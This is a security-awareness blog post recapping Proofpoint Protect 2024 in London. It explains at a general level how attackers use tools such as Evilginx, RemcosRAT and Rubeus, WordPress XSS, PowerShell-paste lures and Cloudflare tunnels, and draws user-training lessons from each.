How cybercriminals bypass your technical defences with Evil Twin Tools and some other insights from Proofpoint Protect 2024 (London)
Last week, Proofpoint was in London as part of its ProofPointProtect roadshow. Proofpoint is perhaps best known for its secure email gateways, which organisations worldwide use. It was a pleasure meeting their super-nice team and listening to some fascinating insights. One theme repeatedly brought up was how cybercriminals can bypass many technical defences with so-called “Evil Twin” tools.
Defeating technical defences with Evil Twin tools.
“Evil-Twin” tools are now in widespread use by cybercriminals. Each year organisations spend substantial amounts on technical defences such as email gateways, next-generation firewalls and WAFs. However, in tandem with the sophistication and scope of this defence ecosystem, cybercriminals have developed their own “evil-twin” eco-system to circumvent these defences. Here are some real-life examples:
Defeating Multi-Factor Authentication
According to the latest Proofpoint data, 52% of hijacked accounts had MFA enabled. This is a shockingly high figure. Multi-factor authentication systems can be bypassed using tools like Evilginx. This MFA “defeat kit " in-a-box enables cybercriminals to easily set up bogus credential-entry landing pages with session hijacking mechanisms to steal authentication tokens. This means that email accounts (such as Microsoft 365) protected by MFA mechanisms can be compromised.
Implication for Security Awareness: Security awareness people need to stop trotting out lines like “MFA prevents 99% of phishing attacks.” This lulls users into a false sense of security. Of course, users need to be told to enable MFA on their accounts, but they should also be told that MFA is not infallible and that good cyber hygiene needs to be practiced.
Defeating Next-Generation Firewalls
While terms like “next-generation firewall” might sound reassuringly sophisticated, these, too, can be defeated. For example, a cybercriminal can download and package a tool like RemcosRAT and send it via phishing (what else…!) to their target. And the RemcosRAT is a sneaky little bugger. It can easily be “crypted” and packed to make its payload challenging to detect. Moreover, it hitches a ride on the native “explorer.exe” process of Windows to eschew detection. Not only that, but RemcosRAT also exploits PowerShell to gain privilege escalation. So even if your Windows systems are locked down in standard-user mode, this malicious remote access escalates itself to run in admin mode. Once in situ, it communicates with its C2 server using harder-to-detect domains thanks to DGA (Domain Generation Algorithms). What can RemcosRAT do once installed? Well, it gives cybercriminals almost complete control over your PC, enabling them to access files, record keystrokes, record screens, turn on your webcam, and steal login credentials. All because you opened that attachment or weblink…
Implication for your Security Awareness: RemcosRAT is a favourite tool in technical support scams. “A problem has been detected with your system or account. You need to download this tool.” A message like this becomes very believable when a hijacked or spoofed email belonging to an MSP, IT contractor, or in-house IT team is used. And talking about account-takeover, the latest Proofpoint data shows that 56% of organisations have experienced an account-take over event in the last year.
If a cybercriminal gets into your Windows environment, weak internal passwords make very easy work for tools like Rubeus
Many organisations have bought Privileged Access Management tools to protect privileged accounts. These accounts are critical because they have the power to make machine privilege changes network-wide. If, for example, a cybercriminal was preparing the ground to execute a crypto-ransomware attack – escalating privileges would be an important step. Moreover, by protecting privileged accounts, you mitigate the risk of a hacker moving laterally across your network. However, yet again, cybercriminals have devised their “evil twin” tools to defeat these defences. One such tool is Rubeus. This Kerberos ticket-grabbing tool with a pass-the-ticket function can survey your Active Directory landscape and brute-force accounts with weak passwords.
Implications for Security Awareness Users must remember that robust passwords are not just required for external cloud-based services. Robust passwords need to be set to prevent account takeover and lateral movement should a hacker get inside their organisation’s network. Users must be informed that cybercriminals will use tools like Rubeus to bruteforce weak passwords and that setting robust passwords can lowers their risk.
The weaponisation of WordPress
WordPress-powered sites account for almost 40% of the web. Unfortunately, some WordPress sites have plug-ins and “themes” that are months, if not years, out-of-date. Many of these sites still use default login credentials such as “admin.” These vulnerabilities are catnip for cybercriminals. One speaker at Proofpoint Protect explained how a cross-site scripting (XSS) attack can inject a WordPress site with malware. When a user visits the infected website, they will see a rather urgent message on their screen that their browser needs updating – which, of course, if clicked, culminates in a malware infection.
Implication for Security Awareness: A user might visit an otherwise trustworthy website with a WordPress blog section infected with XSS malware. When they see a notification pop-up about an out-of-date browser, they might erroneously infer that the message is genuine. Users who trust a website are likelier to follow its instructions. This could result in their browser getting compromised and their credentials for Microsoft 365 or some other cloud service being compromised.
The weaponisation of PowerShell
PowerShell is a powerful task automation and configuration management tool built into the Windows operating system. The researchers at Proofpoint have discovered at least one cybercriminal group (TA571) actively distributing PowerShell commands to deliver DarkGate and Matanbuchus malware. This attack normally starts with a user engaging with a malspam message or visiting an infected website, where their browser gets injected. Shortly thereafter, the user is presented with a pop-up text box with commands. It is suggested to the user that they open Powershell by using the Windows key + X keyboard shortcut and they input the commands.
Implication for Security Awareness: This Powershell-themed phishing message is very interesting one because of its potential power to misdirect. The message looks pretty technical-sounding and is even framed as a guide to a problem with their system. These are two attributes that users don’t normally associate with phishing attacks. Users need to be shown some real-life samples of these Powershell-themed attacks to increase their “immunity” to them.
Malicious Cloudflare tunnels can be used bypass your technical defences and exfiltrate your data
For some network and systems administrators, Cloudflare is generally perceived as a secure service. And for the most part, it is. However, according to Proofpoint researchers, services such as TryCloudflare are increasingly being used as malware delivery mechanisms. This is worrying because firewalls and secure email gateways can’t see what is transiting through a Cloudflare tunnel. And Cloudflare, because it’s generally perceived as a “safe” application, is less likely to be flagged as suspicious by your perimeter firewall. This means that the end-user plays a pivotal role in not allowing any malicious Cloudflare tunnels into their organisation in the first place.
Implication for Security Awareness: Many attacks involving malicious Cloudflare tunnels start with a finance-themed phishing email where the user is persuaded to click on a VBS or LNK file. Many users don’t understand that cybercriminals can tunnel into their organisation’s network, evading defences such as end-point detection or network firewalls. And users don’t often know that the first step in this “tunnelling process” is opening up an attachment or weblink.
More than ever, users play a critical role in protecting your organisation's information assets and infrastructure. SecureClick provides interactive and customised security awareness training. Our service is offered virtually (over Zoom / MS Teams), on-site or over our elearning and microlearning platforms.